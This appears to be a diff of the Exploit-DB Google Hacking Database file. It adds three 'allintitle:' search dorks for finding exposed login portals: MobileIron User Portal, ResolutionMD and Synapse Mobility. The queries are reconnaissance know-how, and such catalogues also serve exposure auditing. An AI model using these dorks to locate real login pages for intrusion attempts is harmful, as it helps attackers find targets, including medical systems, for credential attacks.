@@ -68039,6 +68099,21 @@ Author: Sibi Mathew George 2021-10-25 César Hernández Obispo + + 8125 + https://www.exploit-db.com/ghdb/8125 + Pages Containing Login Portals + allintitle:"MobileIron User Portal: Sign In" + # Google Dork: allintitle:"MobileIron User Portal: Sign In" +# Pages Containing Login Portals +# Date:29/03/2023 +# Exploit Author: Heverin Hacker + allintitle:"MobileIron User Portal: Sign In" + https://www.google.com/search?q=allintitle:"MobileIron User Portal: Sign In" + + 2023-03-29 + Heverin Hacker + 8092 https://www.exploit-db.com/ghdb/8092 @@ -68054,6 +68129,21 @@ Author: Sibi Mathew George 2023-02-27 GirlsLearnCyber + + 8127 + https://www.exploit-db.com/ghdb/8127 + Pages Containing Login Portals + allintitle:"ResolutionMD Login" + # Google Dork: allintitle:"ResolutionMD Login" +# Pages Containing Login Portals +# Date:29/03/2023 +# Exploit Author: Heverin Hacker + allintitle:"ResolutionMD Login" + https://www.google.com/search?q=allintitle:"ResolutionMD Login" + + 2023-03-29 + Heverin Hacker + 8095 https://www.exploit-db.com/ghdb/8095 @@ -68069,6 +68159,21 @@ Author: Sibi Mathew George 2023-02-27 GirlsLearnCyber + + 8126 + https://www.exploit-db.com/ghdb/8126 + Pages Containing Login Portals + allintitle:"Synapse Mobility Login" + # Google Dork: allintitle:"Synapse Mobility Login" +# Pages Containing Login Portals +# Date:29/03/2023 +# Exploit Author: Heverin Hacker + allintitle:"Synapse Mobility Login" + https://www.google.com/search?q=allintitle:"Synapse Mobility Login" + + 2023-03-29 + Heverin Hacker + 8091 https://www.exploit-db.com/ghdb/8091